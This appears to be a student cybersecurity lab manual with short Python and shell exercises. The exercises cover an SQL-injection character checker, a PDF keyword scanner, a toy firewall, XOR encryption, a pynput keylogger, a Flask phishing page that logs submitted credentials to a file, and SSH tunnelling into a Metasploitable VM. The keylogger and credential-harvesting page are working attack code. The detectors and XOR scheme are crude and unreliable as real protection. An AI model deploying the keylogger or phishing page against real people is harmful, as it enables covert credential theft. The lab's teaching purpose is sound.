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SQL Injection Check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check_sql_injection(input_string):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sql_injection_patterns = ['"', '|', '=', '--', '~']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pattern in sql_injection_patterns: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pattern in input_string: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f"Potential SQL Injection detected: '{pattern}' found."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"No SQL Injection detected."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input_string = input("Enter a string to check for SQL injection: ")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= check_sql_injection(input_string)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2.PDF Malware Analysis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pypdf import PdfReader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= ['/js', 'JavaScript', '/AA', '/open_action'] reader = PdfReader('sample.pdf')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pdf_safe = True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page_num, page in enumerate(reader.pages):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= page.extract_text() if text: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keyword in keywords: if keyword in text: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print(f"Malicious PDF detected: Keyword '{keyword}' found on page {page_num + 1}") pdf_safe = False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print(f"Page {page_num + 1} has no extractable text.")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pdf_safe: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print("The PDF is safe.")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Simple Firewall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def simple_firewall(packet):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trusted_ips = ["192.168.1.100"]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trusted_ports = [80, 443]  # HTTP and HTTPS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packet["src_ip"] in trusted_ips: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packet["dst_port"] in trusted_ports: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True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False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packets = [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{"src_ip": "192.168.1.100", "dst_ip": "192.168.1.200", "dst_port": 80},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{"src_ip": "192.168.1.101", "dst_ip": "192.168.1.200", "dst_port": 80},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{"src_ip": "192.168.1.100", "dst_ip": "192.168.1.200", "dst_port": 22},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packet in packets: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simple_firewall(packet):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print(f"Packet allowed: {packet}")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print(f"Packet blocked: {packet}")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Symmetric Encryption &amp; Decryption (XOR)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xor_encrypt_decrypt(input_string, key):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input_bytes = bytearray(input_string, 'utf-8')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output_bytes = bytearray([byte ^ key for byte in input_bytes])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output_bytes.decode('utf-8', 'ignore')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= 123  # XOR key (any integer value)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original_text = input("Enter the message\n")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encrypted_text = xor_encrypt_decrypt(original_text, key)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print(f"Encrypted: {encrypted_text}")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decrypted_text = xor_encrypt_decrypt(encrypted_text, key)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print(f"Decrypted: {decrypted_text}")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5.User Activity Logger (Keylogger)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/*import pynput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pynput.keyboard import Key,Listener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log_file="keylog.txt"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on_press(key):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open(log_file,"a")as f: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f.write(key.char)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AttributeError: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key==Key.space:f.write(" ")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elif key==Key.enter:f.write("\n")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elif key==Key.tab:f.write("\t")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else:f.write(f"{key}")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on_release(key):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key==Key.esc:return False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listener=Listener(on_press=on_press,on_release=on_release)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listener.start()/*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6Process Listing by a new Linux user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unix commands to create a new user in a linux system, log into that user and write a shell script to display all current processes, give that script execute permission, verify it and run to obtain a process list Step 1: Create a new user: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adduser username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Login as the new user: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- username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Create a script to display all processes nano process_list.sh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Write the commands and save your script #!/bin/bash ps aux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Give your script execute-access and verify it chmod +x process_list.sh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 process_list.sh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Execute the script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7 - Phishing Simulation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dummy login page and use python script to steal the login credentials Prerequisite: Install python3 &amp; flask on your device using the following commands sudo apt install python3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python3-flask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flask import Flask, render_template_string, request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LOGIN_PAGE = """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&lt;title&gt;Login Page&lt;/title&gt;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&lt;h2&gt;Login&lt;/h2&gt;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&lt;form method="POST" action="/login"&gt;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 for="username"&gt;Username:&lt;/label&gt;&lt;br&gt;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type="text" id="username" name="username" required&gt;&lt;br&gt;&lt;br&gt;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 for="password"&gt;Password:&lt;/label&gt;&lt;br&gt;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type="password" id="password" name="password" required&gt;&lt;br&gt;&lt;br&gt;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type="submit"&gt;Login&lt;/button&gt;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CREDENTIALS_FILE = "credentials.txt"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render_template_string(LOGIN_PAGE)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@app.route('/login', methods=['POST'])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username = request.form.get('username')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password = request.form.get('password')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open(CREDENTIALS_FILE, 'a') as f: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f.write(f"Username: {username}, Password: {password}\n")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"&lt;h2&gt;Login successful!&lt;/h2&gt;"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os.path.exists(CREDENTIALS_FILE):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os.remove(CREDENTIALS_FILE)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print("Starting the dummy login server. Open http://127.0.0.1:5000 in your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browser.")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8 - SSH Tunnelling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2 VMs and demonstrate SSH Tunnelling between them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Kali Linux Virtual Machine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Metasploitable Virtual Machine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both VMs and run the ifconfig command to get IPs of both devices.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VM1 and VM2 from each other using ping &lt;IP&gt; command from both VMs to confirm connectivity between both VMs.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SSH and Python on both terminals using the following commands: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openssh-client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python3 or sudo apt-get install python3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python server on Metasploitable VM (victim)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python3 -m http.server 8080 or python -m SimpleHTTPServer 8080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SSH to connect to victim VM from Kali VM (attacker)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-L 9090:localhost:8080 msfadmin@&lt;Metasploitable_IP&gt;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does not work use the following command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-o HostkeyAlgorithms=+ssh-rsa -L 9090:localhost:8080 msfadmin@&lt;Metasploitable_IP&gt;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Step 6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Kali VM, Open the browser and search http://localhost:9090. You can see the content of Metasploitable VM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